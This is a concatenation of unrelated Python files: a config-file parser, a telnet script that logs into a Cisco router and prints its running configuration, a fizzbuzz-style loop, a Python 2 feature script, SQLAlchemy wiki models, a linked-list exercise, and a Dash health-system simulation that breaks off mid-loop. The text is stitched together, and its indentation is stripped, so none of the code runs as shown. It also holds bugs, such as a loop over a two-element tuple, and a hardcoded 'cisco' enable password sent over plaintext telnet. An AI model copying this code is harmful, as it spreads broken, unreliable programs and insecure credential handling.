1. Home Directory always overrides any other settings
2. /etc/default/{{file_name}} overrides defaults
3. Defaults are used last
For help with config files please see:
https://docs.python.org/2/library/configparser.html
"""
import logging
import os
import re
import traceback
from collections import OrderedDict
import six
if six.PY2:
from backports import configparser
from backports.configparser import NoOptionError, InterpolationSyntaxError, InterpolationDepthError, \
MAX_INTERPOLATION_DEPTH, NoSectionError, InterpolationMissingOptionError, _UNSET
else:
import configparser
from configparser import NoOptionError, InterpolationSyntaxError, InterpolationDepthError, \
MAX_INTERPOLATION_DEPTH, NoSectionError, InterpolationMissingOptionError, _UNSET
def from_none(exc):
"""raise from_none(ValueError('a')) == raise ValueError('a') from None"""
exc.__cause__ = None
exc.__suppress_context__ = True
return exc
log = logging.getLogger(__name__)
SECTION_REGEX = re.compile('%\((\w+):(\w+)\)s')
class SuperInterpolator(configparser.ExtendedInterpolation):
_KEYCRE = re.compile(r"\$\{([^}]+)\}|\$\(([^)]+)\)")
def before_get(self, parser, section, option, value, defaults, context=None):
L = []
self._interpolate_some(parser, option, L, value, section, defaults, 1, context=context)
if all((isinstance(x, six.string_types) for x in L)):
return ''.join(L)
return L[0]
def _interpolate_some(self, parser, option, accum, rest, section, map, depth, context=None):
if not isinstance(rest, six.string_types):
return
rawval = parser.get(section, option, raw=True, fallback=rest)
if depth > MAX_INTERPOLATION_DEPTH:
raise InterpolationDepthError(option, section, rawval)
while rest:
p = rest.find("$")
if p < 0:
accum.append(rest)
return
if p > 0:
accum.append(rest[:p])
rest = rest[p:]
# p is no longer used
c = rest[1:2]
c_groups = ["{", "("]
if c == "$":
accum.append("$")
rest = rest[2:]
elif c in c_groups:
m = self._KEYCRE.match(rest)
if m is None:
raise InterpolationSyntaxError(option, section,
"bad interpolation variable reference %r" % rest)
group = c_groups.index(c) + 1
path = m.group(group).split(':')
rest = rest[m.end():]
sect = section
opt = option
v = ""
try:
if group == 1:
if len(path) == 1:
opt = parser.optionxform(path[0])
v = map[opt]
elif len(path) == 2:
sect = path[0]
opt = parser.optionxform(path[1])
v = parser.get(sect, opt, raw=True)
else:
raise configparser.InterpolationSyntaxError(
option, section,
"More than one ':' found: %r" % (rest,))
elif group == 2:
if not context:
raise configparser.InterpolationError(option, section, "Trying to interpolate from "
"context with no context!")
if len(path) == 1:
v = context[path[0]]
else:
raise configparser.InterpolationSyntaxError(
option, section,
"More than one ':' found: %r" % (rest,))
except (KeyError, NoSectionError, NoOptionError):
raise from_none(InterpolationMissingOptionError(
option, section, rawval, ":".join(path)))
if v and "$" in v:
self._interpolate_some(parser, opt, accum, v, sect,
dict(parser.items(sect, raw=True)),
depth + 1, context=context)
elif v:
accum.append(v)
else:
raise InterpolationSyntaxError(
option, section,
"'$' must be followed by '$' or '{' or '(', "
"found: %r" % (rest,))
class AttrDict(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self.__dict__ = self
def __deepcopy__(self, memo):
dcopy = type(self)(**self)
memo[id(self)] = dcopy
return dcopy
class MultiFileConfigParser(configparser.ConfigParser):
"""
Pulls in multiple config files and merges them into one configuration.
Resolves variables with a context and can replace objects:
$<variable> will resolve to a python object out of the context.
{variable} will be formatted as a string out of the context.
"""
file_name = None
_DEFAULT_INTERPOLATION = SuperInterpolator()
def __init__(self, file_name, default_file=None, auto_read=True, *args, **kwargs):
self.file_name = file_name
self.default_file = default_file
super(MultiFileConfigParser, self).__init__(*args, **kwargs)
self.config_files = []
if auto_read:
self.read_configs()
def add_config_file(self, path, required=False):
if path:
if os.path.exists(path):
self.config_files.append(path)
try:
self.read(path)
except:
log.error('Failed to load file {}: {}'.format(path, traceback.format_exc()))
raise
else:
if not required:
log.info('Configuration path does not exist, skipping: {}'.format(path))
else:
raise ValueError('Required configuration file does not exist: {}'.format(path))
def read_configs(self):
default_config = self.default_file
etc_config = '/etc/default/{}'.format(self.file_name)
home_config = None
if "HOME" in os.environ:
try:
home_config = os.path.join(os.environ.get('HOME'), '.{}'.format(self.file_name))
except AttributeError:
log.info('Unable to load home configs.')
config_files = [default_config, etc_config, home_config]
for cf in config_files:
self.add_config_file(cf)
def get(self, section, option, **kwargs):
raw = kwargs.get('raw', False)
vars = kwargs.get('vars', None)
fallback = kwargs.get('fallback', _UNSET)
context = kwargs.get('context', None)
try:
d = self._unify_values(section, vars)
except NoSectionError:
if fallback is _UNSET:
raise
else:
return fallback
option = self.optionxform(option)
try:
value = d[option]
except KeyError:
if fallback is _UNSET:
raise NoOptionError(option, section)
else:
return fallback
if raw or value is None:
return value
else:
return self._interpolation.before_get(self, section, option, value, d, context=context)
def gettuple(self, section, option, delimiter=',', context=None):
val = self.get(section, option, context=context)
return tuple([v.strip() for v in val.split(delimiter) if v])
def getlist(self, section, option, delimiter=',', context=None):
val = self.get(section, option, context=context)
return list([v.strip() for v in val.split(delimiter) if v])
def getdict(self, section, context=None):
return OrderedDict(self.items(section, context=context))
def getvalues(self, section, context=None):
return self.getdict(section, context=context).values()
def getkeys(self, section, context=None):
return self.getdict(section, context=context).keys()
def getsettings(self, section, raw=False, vars=None, context=None):
return OrderedDict(((str(k).upper(), v) for k, v in self.items(section, raw=raw, vars=vars, context=context)))
def items(self, section=_UNSET, raw=False, vars=None, context=None):
if section is _UNSET:
return super(MultiFileConfigParser, self).items()
d = self._defaults.copy()
try:
d.update(self._sections[section])
except KeyError:
if section != self.default_section:
raise NoSectionError(section)
# Update with the entry specific variables
if vars:
for key, value in vars.items():
d[self.optionxform(key)] = value
value_getter = lambda option: self._interpolation.before_get(self,
section, option, d[option], d, context=context)
if raw:
value_getter = lambda option: d[option]
return ((option, value_getter(option)) for option in d.keys())
def getenv(self, section, option, key=None, type=str, context=None):
"""
Try and get the option out of os.enviorn and cast it, otherwise return the default (casted)
:param section: settings section name
:param option: the name of the option
:param key: The name of the os.enviorn key. Defaults to option.
:param type: the type to cast it to
:return: parsed value
"""
if key is None:
key = option
value = os.environ.get(key, None)
if value is not None:
try:
return type(value)
except TypeError:
pass
value = self.get(section, option, context=context)
if value:
return type(value) |
import telnetlib
import getpass
host = '192.168.122.10'
user = input('Enter the username:')
#it will ask for the password without echoing it at the console
#the script must be run at the console and not in PyCharm or IDLE
#password = 'cisco'
password = getpass.getpass('Enter the password:')
tn = telnetlib.Telnet(host)
tn.read_until(b'Username: ')
tn.write(user.encode() + b'\n')
tn.read_until(b'Password: ')
tn.write(password.encode() + b'\n')
tn.write(b'enable\n')
tn.write(b'cisco\n') #this is the enable password
tn.write(b'terminal length 0\n') #this command is necessary to disable paging
tn.write(b'sh running-config\n')
tn.write(b'exit\n')
result = tn.read_all().decode()
print(result)
|
#Nick Zapata - Daily lesson - 2/8/18
for counter in(1, 20):
if (counter % 3 == 0) and (counter % 5 == 0):
print('usb device')
elif (counter % 3 == 0):
print('usb')
elif (counter % 5 == 0):
print('device')
else:
print(counter)
|
'''
Created on Mar 27, 2014
do:
binarize label
feature -> init name
@author: cx
'''
import site
import pickle
site.addsitedir('/bos/usr0/cx/PyCode/Geektools')
site.addsitedir('/bos/usr0/cx/PyCode/cxPyLib')
site.addsitedir('/bos/usr0/cx/PyCode/QueryExpansion')
site.addsitedir('/bos/usr0/cx/PyCode/SupervisedQueryExpansion')
from base.ExpTerm import *
from cxBase.base import *
from TermFeatureProcessing.FeatureHash import *
from TermFeatureProcessing.DiscardSingleQFeature import DiscardSingleQFeature
from cxBase.FeatureBase import cxFeatureC
import sys
if 3 > len(sys.argv):
print "2 para: input + outname + (positivebar default 0) + filter fraction min (default 0.01)"
sys.exit()
InName = sys.argv[1]
OutName = sys.argv[2]
DictName = OutName + "_initdict"
PosBar = 0
if len(sys.argv) >= 4:
PosBar = float(sys.argv[3])
MinFilterFrac = 0.01
if len(sys.argv) >= 5:
MinFilterFrac = float(sys.argv[4])
llExpTerm = ReadQExpTerms(InName)
print "read term from [%s] done" %(InName)
# llExpTerm = DiscardSingleQFeature(llExpTerm)
# print "discard feature that only appear in one q done"
lExpTerm = []
for mid in llExpTerm:
lExpTerm.extend(mid)
lExpTerm = cxFeatureC.FilterByFraction(lExpTerm, MinFilterFrac)
print "filter dim by min frac [%f] done" %(MinFilterFrac)
lExpTerm = InitizeFeature(lExpTerm,DictName)
print "initize feature done"
#add normilization
lExpTerm = MinMaxFeatureNormalize(lExpTerm)
lExpTerm = BinarizeScore(lExpTerm,PosBar)
print "binarizescore done"
out = open(OutName,'w')
for ExpTerm in lExpTerm:
print >> out,ExpTerm.dump()
out.close()
print "finished"
|
from datetime import datetime
from sqlalchemy import Column, Integer, String, ForeignKey, Text, Boolean, \
DateTime, MetaData
from sqlalchemy.orm import relationship
from app import db
convention = {
"ix": 'ix_%(column_0_label)s',
"uq": "uq_%(table_name)s_%(column_0_name)s",
"ck": "ck_%(table_name)s_%(constraint_name)s",
"fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
"pk": "pk_%(table_name)s"
}
metadata = MetaData(naming_convention=convention)
class Page(db.Model):
__tablename__ = 'page'
id = Column(Integer, primary_key=True, autoincrement=True)
title = Column(String, index=True, unique=True)
revision_latest = Column(String)
revision = relationship("Revision", backref="page",
foreign_keys="Revision.page_id",
cascade="all,delete")
def __repr__(self):
return '<{}>'.format(self.title)
@staticmethod
def create_with_revision(data):
page = Page(title=data.get('title'))
content = Content(text=data.get('content'))
revision = Revision(page=page, content=content, actual=True)
db.session.add(revision)
db.session.commit()
page.set_latest_revision(revision)
content.add_revision(revision)
return {
'id': page.id,
'title': page.title,
'actual': revision.id,
'content': content.text
}
def update_with_revision(self, data):
content = Content(text=data.get('content'))
revision = Revision(page=self, content=content, actual=True)
db.session.add(revision)
db.session.commit()
revision.set_as_actual()
content.add_revision(revision)
return {
'id': self.id,
'title': self.title,
'actual': revision.id,
'content': content.text
}
def set_latest_revision(self, revision):
self.revision_latest = revision.id
db.session.add(self)
db.session.commit()
class Content(db.Model):
__tablename__ = 'content'
id = Column(Integer, primary_key=True, autoincrement=True)
text = Column(Text)
revision_id = Column(Integer, ForeignKey('revision.id', use_alter=True,
name='revision_fk'))
revision = relationship("Revision", backref="content",
foreign_keys="Revision.content_id")
def add_revision(self, revision):
self.revision_id = revision.id
db.session.add(self)
db.session.commit()
class Revision(db.Model):
__tablename__ = 'revision'
id = Column(Integer, primary_key=True, autoincrement=True)
page_id = Column(Integer,
ForeignKey('page.id', use_alter=True, name='page_fk'))
content_id = Column(Integer, ForeignKey('content.id', use_alter=True,
name='content_fk'))
actual = Column(Boolean)
add_date = Column(DateTime,
nullable=False,
default=datetime.utcnow
)
def set_as_actual(self):
db.session.query(Revision).filter_by(page_id=self.page_id).update(
{'actual': False})
self.actual = True
db.session.add(self)
db.session.commit()
return {
'id': self.id,
'add_date': self.add_date,
'page_id': self.page_id,
'actual': self.actual,
'text': self.content.text,
'title': self.page.title
}
|
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
# class Solution:
# def addTwoNumbers(self, l1, l2):
#
# """
# :type l1: ListNode
# :type l2: ListNode
# :rtype: ListNode
# """
#
# len1 = len(l1)
# len2 = len(l2)
# inter = []
#
# if len1 <= len2:
# l1,l2 = l2,l1
# len1,len2 = len2,len1
#
# addi = 0
#
# for i in range(len2):
#
# if addi == 1:
#
# if (l1[i] + l2[i] + 1) >= 10:
#
# inter.append((l1[i] + l2[i] + 1) % 10)
# addi = 1
# else:
# inter.append(l1[i] + l2[i] + 1)
# addi = 0
# else:
#
# if (l1[i] + l2[i]) >= 10:
#
# inter.append((l1[i] + l2[i]) % 10)
# addi = 1
# print(addi)
# else:
# inter.append(l1[i] + l2[i])
# addi = 0
#
# if len1 == len2:
# if addi == 1:
# inter.append(1)
# return inter
# else:
# for i in range(len2,len1):
#
# if i == len1:
# if addi == 1:
# if l1[i] + 1 >= 10:
# inter.append((l1[i] + 1) % 10)
# addi = 1
# else:
# inter.append((li[i] + 1) % 10)
# addi = 0
# else:
# inter.append(l1[i] % 10)
# else:
# if addi == 1:
# if l1[i] + 1 >= 10:
# inter.append((l1[i] + 1) % 10)
# addi = 1
# else:
# inter.append((l1[i] + 1) % 10)
# addi = 0
# else:
# inter.append(l1[i] % 10)
# if addi == 1:
# inter.append(1)
#
# return inter
class Solution:
def addTwoNumbers(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
val_sum = l1.val + l2.val
list_node = ListNode(val_sum % 10)
a = val_sum // 10
node = list_node
while True:
try:
l1 = l1.next
except:
pass
try:
l2 = l2.next
except:
pass
if not l1 and not l2:
break
elif not l1:
l1_val = 0
l2_val = l2.val
elif not l2:
l2_val = 0
l1_val = l1.val
else:
l1_val = l1.val
l2_val = l2.val
val_sum = l1_val + l2_val + a
temp_node = ListNode(val_sum % 10)
node.next = temp_node
node = temp_node
a = val_sum // 10
if a != 0:
node.next = ListNode(a)
return list_node
if __name__ == '__main__':
l1 = []
l2 = []
S = Solution()
s = S.addTwoNumbers(l1,l2)
print(s)
|
import dash
from dash import html, dcc
from dash.dependencies import Input, Output, State, MATCH, ALL
import dash_bootstrap_components as dbc # conda install -c conda-forge dash-bootstrap-components
import pandas as pd
import numpy as np
import plotly.graph_objects as go
import random
from Mother import Mother
from Dash_ODE_Methods import logistic, many_sliders, make_slider
random.seed(10)
# INITIALIZE DATA FOR CLASS MOTHER
# read file of data with columns 1-4 [Mother]: wealth, education, age, number of children
# simulate for health, gestational age, predisposition for ANC
df = pd.read_excel("SDR_Mother.xlsx")
wealth = df['Wealth'].to_numpy()
education = df['Education'].to_numpy()
age = df['Age'].to_numpy()
no_children = df['No_children'].to_numpy()
n_repeat = 1 # n_repeat greater than 1 makes the code run slow, it is better to repeat in the Excel file
for i in range(n_repeat):
wealth = wealth.repeat(n_repeat)
education = education.repeat(n_repeat)
age = age.repeat(n_repeat)
no_children = no_children.repeat(n_repeat)
wealth = wealth.repeat(n_repeat)
no_mothers = len(age)
# quality = 0.7
proximity = 0.8
# CLASS MOTHER
# class Mother_simple():
# def __init__(self, urban=True, wealth=False):
# self.urban = urban # True or False
# self.wealth = wealth
# self.proportion_healthy = 0.4
# self.proportion_d_home = 0.3
# rand = np.random.random(1)[0]
# if rand < self.proportion_d_home:
# self.prefer_d_home = True
# else:
# self.prefer_d_home = False
# self.QoC_threshold = 0.3
# self.QoC_home = 0.1
# self.QoC_healthy_mother_threshold = 0.03
# self.QoC_healthy_baby_threshold = 0.04
#
# def health_BL(self):
# if np.random.random(1)[0] < self.proportion_healthy:
# health_status_at_BL = 1;
# else:
# health_status_at_BL = 0;
# return health_status_at_BL
#
# def decide(self, QoC_2, QoC_4):
# if self.proportion_d_home and QoC_2 < self.QoC_threshold and QoC_4 < self.QoC_threshold:
# self.decision = 0
# elif QoC_2 < QoC_4:
# self.decision = 2
# else:
# self.decision = 1
# return self.decision # e.g., 0=home delivery, 1=2/3 delivery, 2=4/5 delivery
#
# def health_outcome(self, QoC_2, QoC_4):
# QoCs = (self.QoC_home, QoC_2, QoC_4)
# QoC = QoCs[self.decision]
# QoC_received = QoC * np.random.random(1)[0]
# if self.QoC_healthy_mother_threshold < QoC_received:
# health_outcome_of_mother = 0
# else:
# health_outcome_of_mother = 1
#
# if self.QoC_healthy_baby_threshold < QoC_received:
# health_outcome_of_baby = 0
# else:
# health_outcome_of_baby = 1
#
# return health_outcome_of_baby, health_outcome_of_mother
#
# GENERATE MOTHERS
# mothers = []
# num_mothers = 100
# proportion_wealthy = 0.1
# proportion_urban = 0.3
# for i in range(num_mothers):
# mothers.append(Mother(urban=(np.random.random(1)[0] < proportion_urban),
# wealth=(np.random.random(1)[0] < proportion_urban)))
def set_variables(X_info, name_append = '', nt=0):
X_names, X_0, X_label, X_idx_names = [], [], [], []
for i in range(len(X_info)):
name = X_info[i][0] # name of the variable is set, e.g. name = 'P_P_target'
X_names.append(name) # C_names = ['P_P_target',...]
X_idx_names.append([i, name]) # C_idx_names = [[0,'P_P_target'],[1,P_D_target],...]
X_0.append(X_info[i][1]) # C_0 = [0.8, 0.7, ...] hard-coded initial value used in sliders
X_label.append(X_info[i][2]) # C_label = ['Political_Goodwill_target',...] for sliders
globals()[name + name_append] = X_0[i] # P_P_target = C_0[0] = 0.8 for model and sliders
if nt > 0: # S_P_P_0 = X_0[0] for stocks
globals()[name] = np.zeros(nt) # S_P_P = np.zeros(nt) for stocks
return X_names, X_0, X_label, X_idx_names
# APP SETUP
# Make time array for solution
nt = 48 # number of months
# RR Resources for RMNCH
# R2 Healthcare financing (Resources for 2/3 facilities)
# R4 Healthcare financing (Resources for 4/5 facilities)
# RS SDR transition financing
# PDS Policy: Development support
# P_P, P_A, P_D
# Names, initial values
S_info = [
['P_P', 0.2, 'Political_Goodwill' ],
['P_A', 0.2, 'SDR_Adoption_Other_Factors' ],
['P_M', 0.2, 'Advocacy/Media' ],
['P_I', 0.2, 'Stakeholder_Involvement' ],
['P_SP', 0.2, 'Support_for_Policy' ],
['P_DP', 0.2, 'Development_Support' ],
['P_RR', 0.2, 'Resources_RMNCH' ],
['L4_HF', 0.2, 'H_Financing_4/5' ],
['L2_HF', 0.2, 'H_Financing_2/3' ],
['S_TF', 0.2, 'SDR_Transition_Financing' ],
['L4_HR', 0.2, 'HR_Readiness_4/5' ],
['L4_S', 0.2, 'Supplies/Infrastructure_4/5'],
['L2_HR', 0.2, 'HR_Readiness_2/3' ],
['L2_S', 0.2, 'Supplies/Infrastructure_2/3'],
['S_T', 0.2, 'SDR_HR_Training' ],
['S_FR', 0.2, 'SDR_Facility_Repurposing' ],
['L4_DC', 0.4, 'Delivery_Capacity_4/5' ],
['L2_DC', 0.9, 'Delivery_Capacity_2/3' ],
['P_D', 0.6, 'Performance_Data' ],
['L4_Q', 0.5, 'Quality_4/5' ],
['L2_Q', 0.1, 'Quality_2/3' ],
]
S_names, S_0, S_label, S_idx_names = set_variables(S_info, nt=nt)
# FACTORS
# Names, initial values
FP_info = [
['Funding_MNCH', 0.2, 'Funding_MNCH' ],
['Support_Linda_Mama', 0.2, 'Support_Linda_Mama' ],
['Prioritization_MNCH', 0.2, 'Prioritization_MNCH' ],
['Adherence_budget', 0.2, 'Adherence_budget' ],
['Employee_incentives', 0.2, 'Employee_incentives' ],
['Visibility', 0.2, 'Visibility' ],
['Timely_promotions', 0.2, 'Timely_promotions' ],
['Action_depletion', 0.2, 'Action_depletion' ],
['Increase_awareness', 0.2, 'Increase_awareness' ],
['Strong_referrals', 0.2, 'Strong_referrals' ],
['Training_incentives', 0.2, 'Training_incentives' ],
['Pos_supply_chain', 0.2, 'Pos_supply_chain' ],
['Increase_awareness_address_myths', 0.2, 'Increase_awareness_address_myths'],
]
FP_combination_info = [
['INCREASE_ALL_P', 0.0, 'INCREASE_ALL_P'],
['INCREASE_ALL_P', 0.0, 'INCREASE_SOME_P'],
]
FN_combination_info = [
['DECREASE_ALL_N', 0.0, 'DECREASE_ALL_N'],
['DECREASE_ALL_N', 0.0, 'DECREASE_SOME_N'],
]
FN_info = [
['Delayed_disbursement', 0.2, 'Delayed_disbursement' ],
['Lack_promotion', 0.2, 'Lack_promotion' ],
['Lack_action_depletion', 0.2, 'Lack_action_depletion'],
['Inadequate_financing', 0.2, 'Inadequate_financing' ],
['Lack_adherence_budget', 0.2, 'Lack_adherence_budget'],
['Delay_hiring', 0.2, 'Delay_hiring' ],
['Frequent_transfer', 0.2, 'Frequent_transfer' ],
['Burn_out', 0.2, 'Burn_out' ],
['Poor_management', 0.2, 'Poor_management' ],
['Neg_supply_chain', 0.2, 'Neg_supply_chain' ],
]
FP_names, FP_0, FP_label, FP_idx_names = set_variables(FP_info)
FP_combination_names, FP_combination_0, FP_combination_label, FP_combination_idx_names = \
set_variables(FP_combination_info)
FN_names, FN_0, FN_label, FN_idx_names = set_variables(FN_info)
FN_combination_names, FN_combination_0, FN_combination_label, FN_combination_idx_names = \
set_variables(FN_combination_info)
B_info = [
['L_Capacity_factor', 20, 'BL_Capacity_Factor' ],
['Initial_Negative_Predisp', 2, 'Initial_Negative_Predisp'],
['Health_outcomes__Predisp', 2.4, 'Health outcome -> Predisp hospital'],
['L4_Q__Predisp', 0.5, 'L4/5 quality -> Predisp hospital' ],
['Health_Predisp', 0.2, 'Health_Predisp -> Predisp hospital'],
['Predisp_ANC_const_0', 0.4, 'Predisp_ANC_const_0'],
['Predisp_ANC_slope_0', 0.2, 'Predisp_ANC_slope_0'],
['Predisp_L2_L4', 4., 'Predisp_L2_L4'], # 1
['Wealth__Predisp', 0.2, 'Wealth__Predisp'], # 0.2
['Education__Predisp', 0.02, 'Education__Predisp'], # 0.02
['Age__Predisp', 0.001, 'Age__Predisp'], # 0.001
['No_Children__Predisp', 0.05, 'No_Children__Predisp'], # 0.05
['Proximity__Predisp', 0.1, 'Proximity__Predisp'], # 0.1
['Health_const_0', 0.8, 'Health_const_0'],
['Health_slope_0', 0.2, 'Health_slope_0'],
['Q_Health_multiplier', 10., 'Q_Health_multiplier'], # 6
['Q_Health_L4_constant', 1.5, 'Q_Health_L4_constant'], # 1.5
['Q_Health_L4_L2_difference', 1., 'Q_Health_L4_L2_difference'], # 1
['Q_Health_L4_referral_difference', 0.5, 'Q_Health_L4_referral_difference'], # 0.5
['Q_Health_Home_negative', 10.0, 'Q_Health_Home_negative'], # 0.5
]
B_names, B_0, B_label, B_idx_names = set_variables(B_info)
# MODEL PARAMETER INFORMATION FOR SLIDERS
C_info = [
['P_P_target', 0.8, 'Political_Goodwill_target'],
['P_D_target', 0.7, 'Data_Performance_target'],
['L2_HF_target_0', 0.8, 'L2/3_HC_Financing_target'],
['L2_target_0', 0.9, 'L2_target_0'],
['L4_target_0', 0.9, 'L4_target_0'],
['S_FR_target_0', 0.7, 'S_FR_target_0'],
['S_T_target_0', 0.9, 'S_T_target_0'],
['dL2_DC_in_0', 0.2, 'dL2_DC_in_0'],
['dL4_DC_in_0', 0.2, 'dL4_DC_in_0'],
['P_DP_target', 0.7, 'P_DP_target'],
['P_M_target', 0.7, 'P_M_target'],
['P_I_target', 0.6, 'P_I_target'],
['P_RR_target_0', 1.0, 'P_RR_target_0'],
['L4_HF_target_0', 0.8, 'L4_HF_target_0'],
['S_TF_target_0', 0.8, 'S_TF_target_0'],
['L2_DC_target', 0.1, 'L2_Delivery_Capacity_Target'],
['L4_DC_target', 0.9, 'L4_Delivery_Capacity_Target'],
]
# SET UP OTHER INTERMEDIATE PYTHON VARIABLES FOR THE MODEL AND SLIDERS
C_names, C_0, C_label, C_idx_names = set_variables(C_info)
def set_F_change(F_0):
F_original = np.zeros(len(F_0)) # original values
F_change = np.zeros(len(F_0)) # changed values based on sliders
for i in range(len(F_0)):
F_original[i] = F_0[i] # get the hard-coded value, originally from F_info
F_change[i] = F_0[i] # initialize (don't copy the object, just the value)
return F_original, F_change
FP_original, FP_change = set_F_change(FP_0)
FN_original, FN_change = set_F_change(FN_0)
y_0 = S_0
def get_factors_0():
return FP_0, FN_0
def calc_y(S_values, FP_values, FN_values, B_values, C_values, P_values): # values from the sliders
# P_values = parameter values
for i in range(len(FP_values)): # for each F-slider
FP_change[i] = FP_values[i] # F-parameter that is collected from the slider
for i in range(len(FN_values)): # for each F-slider
FN_change[i] = FN_values[i] # F-parameter that is collected from the slider
parameters['t_change'] = P_values[0] # slider value for time when the parameters change
parameters['beta'] = P_values[1] # slider value for beta
beta = parameters['beta'] / 10
y_t = np.zeros((nt,len(S_values)))
t_all = np.zeros(nt)
anc_t, health_t, gest_age_t, deliveries, facilities = {0:[0]}, {0:[0]}, {0:[0]}, {0:[0]}, {0:[0]}
# anc_t, health_t, gest_age_t, deliveries, facilities = [[]]*nt, [[]]*nt, [[]]*nt, [[]]*nt, [[]]*nt # NG
num_deliver_home, num_deliver_2, num_deliver_4, num_deliver_total = \
np.zeros(nt), np.zeros(nt), np.zeros(nt), np.zeros(nt)
pos_HO, neg_HO, L2_D_Capacity, L4_D_Capacity = np.zeros([nt,4]), np.zeros([nt,4]), np.ones(nt), np.ones(nt)
for i in range(len(S_values)):
y_t[0,i] = S_values[i]
for idx,name in S_idx_names:
globals()[name][0] = S_values[idx]
B = {} # Use a dictionary so that we only need to pass B to the Mother class
for idx,name in B_idx_names:
B[name] = B_values[idx] # B['Health_outcomes__Predisp'] = 2.4
globals()[name] = B_values[idx] # Health_outcomes__Predisp = 2.4
for idx,name in C_idx_names:
globals()[name] = C_values[idx] # P_P_target = 0.8
mothers = []
for mother in range(0, no_mothers):
mothers.append(Mother(wealth[mother], education[mother], age[mother], no_children[mother], nt, B))
# OTHER MISCELLANEOUS FACTORS
L4_D_Capacity_Multiplier = 2
# LOOP OVER EVERY TIME VALUE
for t in range(0,nt-1):
if t > parameters['t_change']: # IF TIME IS LARGER THAN THE t_change SLIDER VALUE
for idx, name in FP_idx_names:
globals()[name] = FP_change[idx] # then use the SLIDER value for the F-parameter, e.g., Visibility = 0.0
for idx, name in FN_idx_names:
globals()[name] = FN_change[idx] # then use the SLIDER value for the F-parameter, e.g., Visibility = 0.0
else: # otherwise
for idx, name in FP_idx_names:
globals()[name] = FP_original[idx] # use the HARD-CODED value for the F-parameter saved in F_info
for idx, name in FN_idx_names:
globals()[name] = FN_original[idx] # use the HARD-CODED value for the F-parameter saved in F_info
t_all[t+1] = t_all[t] + 1 # increment by month
gest_age, health, anc, delivery, facility = [], [], [], [], []
for idx,name in S_idx_names:
d_name = 'd' + name
globals()[d_name + '_in'] = 0.0
globals()[d_name + '_out'] = 0.0
# if t == 0:
# L2_demand = 0
# L4_demand = 0
# else:
L2_D_Capacity[t] = L2_DC[t] * BL_Capacity_factor
L4_D_Capacity[t] = L4_DC[t] * BL_Capacity_factor * L4_D_Capacity_Multiplier
L2_demand = logistic(num_deliver_2[t] / (L2_D_Capacity[t]))
L4_demand = logistic(num_deliver_4[t] / (L4_D_Capacity[t]))
neg_HO_t = sum(neg_HO[0:t+1,:])
if neg_HO_t[0] == 0:
L2_4_health_outcomes = 0
else:
L2_4_health_outcomes = logistic([
neg_HO_t[1] / neg_HO_t[0],
neg_HO_t[2] / neg_HO_t[0] ])
P_A_target = (P_M[t] * logistic([Visibility, Action_depletion, 1]) + P_I[t]) / 2
P_SP_target = (P_P[t] + P_A[t] + P_D[t] * logistic([Visibility, Action_depletion, 1])) / 3
dP_SP_in = (P_P[t] + P_A[t] + P_D[t])
dP_A_in = (P_M[t] + P_I[t])
P_RR_target = P_RR_target_0 * logistic([Funding_MNCH, Support_Linda_Mama, Prioritization_MNCH, -Delayed_disbursement, -Lack_adherence_budget, 3])
dP_RR_in = P_DP[t] + P_SP[t]
L2_HF_target = L2_HF_target_0 * P_RR[t] * logistic([Adherence_budget, -Lack_adherence_budget, -Inadequate_financing, -Delayed_disbursement, 2])
L4_HF_target = L4_HF_target_0 * P_RR[t] * logistic([Adherence_budget, -Lack_adherence_budget, -Inadequate_financing, -Delayed_disbursement, 2])
S_TF_target = S_TF_target_0 * P_RR[t] * logistic([Adherence_budget, -Lack_adherence_budget, -Inadequate_financing, -Delayed_disbursement, 2])
dL2_HF_in = P_RR[t] # coefficients of these three dStock_in terms add up to 1
dL4_HF_in = P_RR[t]
dS_TF_in = P_RR[t]
# dP_RR_out = dL2_HF_in + dL4_HF_in + dS_TF_in
L2_target_combined_0 = L2_target_0 * L2_HF[t] # combined targets of L2_HR and L2_S =0.9*target of L2_HF
# L2_target_combined_0 = L2_target_0 # combined targets of L2_HR and L2_S =0.9*target of L2_HF
L2_HR_target = L2_target_combined_0 * logistic([Employee_incentives, -Lack_promotion, Timely_promotions, -Delay_hiring, -Frequent_transfer, -Burn_out, -Poor_management, Strong_referrals, Training_incentives, 3])
L2_S_target = L2_target_combined_0 * logistic([-Lack_action_depletion, Pos_supply_chain, -Neg_supply_chain, -L2_demand,2])
dL2_HR_in = L2_HF[t]
dL2_S_in = L2_HF[t]
# dL2_HF_out = dL2_HR_in + dL2_S_in
L4_target_combined_0 = L4_target_0 * L4_HF[t]
# L4_target_combined_0 = L4_target_0
L4_HR_target = L4_target_combined_0 * logistic([Employee_incentives, -Lack_promotion, Timely_promotions, -Delay_hiring, -Frequent_transfer, -Burn_out, -Poor_management, Strong_referrals, Training_incentives, 3])
L4_S_target = L4_target_combined_0 * logistic([-Lack_action_depletion, Pos_supply_chain, -Neg_supply_chain, -L4_demand,2])
dL4_HR_in = L4_HF[t]
dL4_S_in = L4_HF[t]
# dL4_HF_out = dL4_HR_in + dL4_S_in
S_FR_target = S_FR_target_0 * S_TF[t] * logistic([Employee_incentives, -Lack_promotion, Timely_promotions, -Delay_hiring, -Frequent_transfer, -Burn_out, -Poor_management, Strong_referrals, Training_incentives, 3])
S_T_target = S_T_target_0 * S_TF[t] * logistic([Employee_incentives, -Lack_promotion, Timely_promotions, -Delay_hiring, -Frequent_transfer, -Burn_out, -Poor_management, Strong_referrals, Training_incentives, 3])
dS_FR_in = S_TF[t]
dS_T_in = S_TF[t]
# dS_TF_out = dS_FR_in + dS_T_in
# L2_DC_target = 0.1
# L4_DC_target = 0.9
dL2_DC_in = dL2_DC_in_0 * S_FR[t] # target < stock so need to reverse sign here
dL4_DC_in = dL4_DC_in_0 * S_FR[t]
L2_Q_target = (L2_HR_target + L2_S_target) / 2 / L2_target_combined_0 * logistic([Strong_referrals, Increase_awareness, -9*L2_demand,5])
L4_Q_target = (L4_HR_target + L4_S_target) / 2 / L4_target_combined_0 * logistic([Strong_referrals, Increase_awareness_address_myths, -9/2*L4_demand,5])
dL2_Q_in = (L2_HR[t] + L2_S[t])
dL4_Q_in = (L4_HR[t] + L4_S[t])
# Stock[t + 1] = Stock[t] * (1 + beta * (dStock_in - dStock_out)) * (Stock_target - Stock[t])
y_t_list = []
for idx,name in S_idx_names:
d_name = 'd' + name
